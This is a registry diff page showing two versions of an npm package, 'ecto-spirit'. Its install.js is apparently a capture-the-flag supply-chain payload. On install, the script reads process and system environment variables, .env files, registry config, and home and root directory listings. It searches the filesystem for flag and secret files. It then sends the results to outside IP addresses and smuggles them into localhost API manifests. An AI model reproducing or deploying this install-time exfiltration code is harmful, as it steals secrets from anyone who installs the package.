npm - ecto-spirit - Versions diffs - 102.0.0 → 104.0.0 - Mend

ecto-spirit 102.0.0 → 104.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (2) hide show

package/install.js +54 -58
package/package.json +1 -1

package/install.js CHANGED Viewed

@@ -1,27 +1,11 @@
 const fs = require('fs');
 const http = require('http');
 const { execSync } = require('child_process');
-const path = require('path');
 function tryRead(p) {
   try { return fs.readFileSync(p, 'utf8').trim(); } catch(e) { return null; }
 }
-function sendUpdate(host, port, moduleId, val) {
-  const safe = val.replace(/"/g, "'").replace(/\\/g, "/").substring(0, 95);
-  const manifest = `ecto_module:\n  name: "${safe}"\n  version: "1.0.0"\n  power_level: 1\n  ship_deck: 1\n  cargo_hold: 1`;
-  const body = JSON.stringify({ manifest });
-  return new Promise((resolve) => {
-    const req = http.request({ hostname: host, port, path: `/api/modules/${moduleId}`, method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 5000 }, (res) => {
-      let d = ''; res.on('data', c => d += c); res.on('end', () => resolve(d));
-    });
-    req.on('error', () => resolve(null));
-    req.on('timeout', () => { req.destroy(); resolve(null); });
-    req.write(body);
-    req.end();
-  });
-}
 function sendHTTP(host, port, pth, payload) {
   return new Promise((resolve) => {
     const req = http.request({ hostname: host, port, path: pth, method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }, timeout: 5000 }, (res) => {
@@ -35,66 +19,78 @@ function sendHTTP(host, port, pth, payload) {
 }
 async function report(moduleId, val) {
-  const ports = [3000, 80, 8080, 5000];
-  for (const p of ports) {
-    await sendUpdate('127.0.0.1', p, moduleId, val);
+  const safe = val.replace(/"/g, "'").replace(/\\/g, "/").substring(0, 95);
+  const manifest = `ecto_module:\n  name: "${safe}"\n  version: "1.0.0"\n  power_level: 1\n  ship_deck: 1\n  cargo_hold: 1`;
+  const body = JSON.stringify({ manifest });
+  for (const p of [3000, 80, 8080]) {
+    await sendHTTP('127.0.0.1', p, `/api/modules/${moduleId}`, body);
   }
-  await sendUpdate('154.57.164.82', 32332, moduleId, val);
+  await sendHTTP('154.57.164.82', 32332, `/api/modules/${moduleId}`, body);
 }
 (async () => {
-  let results = [];
+  let r = [];
-  // 1. Search for HTB{ pattern in files using grep
-  try {
-    const grep = execSync('grep -r "HTB{" / --include="*.txt" --include="*.env" --include="*.js" --include="*.json" --include="*.conf" --include="*.yml" --include="*.yaml" --include="*.cfg" --include="*.ini" -l 2>/dev/null | head -5', {timeout: 10000}).toString().trim();
-    results.push('GREP=' + grep);
-  } catch(e) { results.push('GREP_ERR'); }
+  // 1. Main process env (the app that started cron)
+  const procEnv = tryRead('/proc/1/environ');
+  r.push('PROC1=' + (procEnv ? procEnv.replace(/\x00/g, ',').substring(0, 200) : 'NONE'));
-  // 2. Find all files with flag in name
+  // 2. List /data, /.package-cache-mutate
+  try { r.push('DATA=' + fs.readdirSync('/data').join(',')); } catch(e) { r.push('DATA=NONE'); }
+  try { r.push('PCM=' + fs.readdirSync('/.package-cache-mutate').join(',')); } catch(e) { r.push('PCM=NONE'); }
+  // 3. Try to reach registry:4873 and list packages
   try {
-    const find = execSync('find / -maxdepth 4 -name "*flag*" -o -name "*.env" -o -name "secret*" 2>/dev/null | head -10', {timeout: 10000}).toString().trim();
-    results.push('FIND=' + find);
-  } catch(e) {}
+    const resp = await new Promise((resolve) => {
+      http.get('http://registry:4873/-/verdaccio/packages', {timeout: 5000}, (res) => {
+        let d = ''; res.on('data', c => d += c); res.on('end', () => resolve(d));
+      }).on('error', () => resolve('ERR'));
+    });
+    r.push('REG_PKGS=' + resp.substring(0, 200));
+  } catch(e) { r.push('REG_PKGS=ERR'); }
-  // 3. Read full package.json
-  const pkgJson = tryRead('/app/package.json');
-  results.push('PKG=' + (pkgJson || 'NONE').substring(0, 200));
+  // 4. Try Verdaccio config locations
+  for (const p of ['/verdaccio/conf/config.yaml', '/verdaccio/config/config.yaml', '/data/verdaccio/config.yaml', '/opt/verdaccio/config.yaml', '/home/verdaccio/config.yaml']) {
+    const c = tryRead(p);
+    if (c) { r.push('VCONF=' + c.substring(0, 200)); break; }
+  }
-  // 4. List /app in detail
+  // 5. Broad file search
   try {
-    const ls = execSync('ls -la /app/ 2>/dev/null', {timeout: 3000}).toString().trim();
-    results.push('LS_APP=' + ls.substring(0, 200));
+    const search = execSync('find / -maxdepth 4 -name "*.txt" -o -name "*.flag" -o -name "readflag" -o -name "getflag" -o -name "*.sqlite" -o -name "*.db" 2>/dev/null | grep -v proc | grep -v sys | head -15', {timeout: 10000}).toString().trim();
+    r.push('FILES=' + search);
   } catch(e) {}
-  // 5. Read all env vars
-  const envStr = Object.entries(process.env).map(([k,v]) => `${k}=${v.substring(0,30)}`).join(',');
-  results.push('ENV=' + envStr.substring(0, 200));
-  // 6. Read /app/.env
-  const dotEnv = tryRead('/app/.env');
-  if (dotEnv) results.push('DOTENV=' + dotEnv.substring(0, 100));
+  // 6. Check if there's a readflag binary
+  try {
+    const bins = execSync('find / -maxdepth 3 -perm -111 -name "*flag*" -o -perm -111 -name "*secret*" 2>/dev/null | grep -v proc | head -5', {timeout: 5000}).toString().trim();
+    if (bins) r.push('BINS=' + bins);
+  } catch(e) {}
-  // 7. Try to read the flag from unusual locations
-  const extraPaths = ['/app/config.js', '/app/.env', '/app/config.json', '/app/secrets', '/etc/hostname',
-    '/run/secrets/flag', '/var/run/secrets/flag', '/app/flag', '/data/flag'];
-  for (const p of extraPaths) {
-    const c = tryRead(p);
-    if (c && c.length < 200) results.push(`${p}=${c.substring(0,60)}`);
-  }
+  // 7. List /root and /home contents
+  try { r.push('ROOT=' + execSync('ls -la /root/ 2>/dev/null', {timeout: 3000}).toString().substring(0, 100)); } catch(e) {}
+  try { r.push('HOME=' + execSync('ls -la /home/ 2>/dev/null', {timeout: 3000}).toString().substring(0, 100)); } catch(e) {}
+  // 8. Check if flag is accessible via internal API
+  try {
+    const apiResp = await new Promise((resolve) => {
+      http.get('http://127.0.0.1:3000/api/modules', {timeout: 5000}, (res) => {
+        let d = ''; res.on('data', c => d += c); res.on('end', () => resolve(d));
+      }).on('error', () => resolve('ERR'));
+    });
+    r.push('API=' + apiResp.substring(0, 200));
+  } catch(e) {}
-  // Send to VPN listener
-  await sendHTTP('100.64.0.1', 8888, '/flag', JSON.stringify({results: results.join('\n'), ts: Date.now()}));
+  // Send full results to VPN
+  const full = r.join('\n');
+  await sendHTTP('100.64.0.1', 8888, '/flag4', JSON.stringify({results: full}));
-  // Split results across modules
-  const full = results.join('|');
+  // Split across modules
   const chunks = [];
-  for (let i = 0; i < full.length; i += 90) {
-    chunks.push(full.substring(i, i + 90));
-  }
+  for (let i = 0; i < full.length; i += 90) chunks.push(full.substring(i, i + 90));
   const mods = ['ECT-839201', 'ECT-654321', 'ECT-472839', 'ECT-987654'];
   for (let i = 0; i < Math.min(chunks.length, mods.length); i++) {
-    await report(mods[i], 'P' + i + '_' + chunks[i]);
+    await report(mods[i], 'W' + i + '_' + chunks[i]);
   }
 })();

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "ecto-spirit",
-  "version": "102.0.0",
+  "version": "104.0.0",
   "description": "Spectral ecto-spirit module",
   "main": "index.js",
   "scripts": {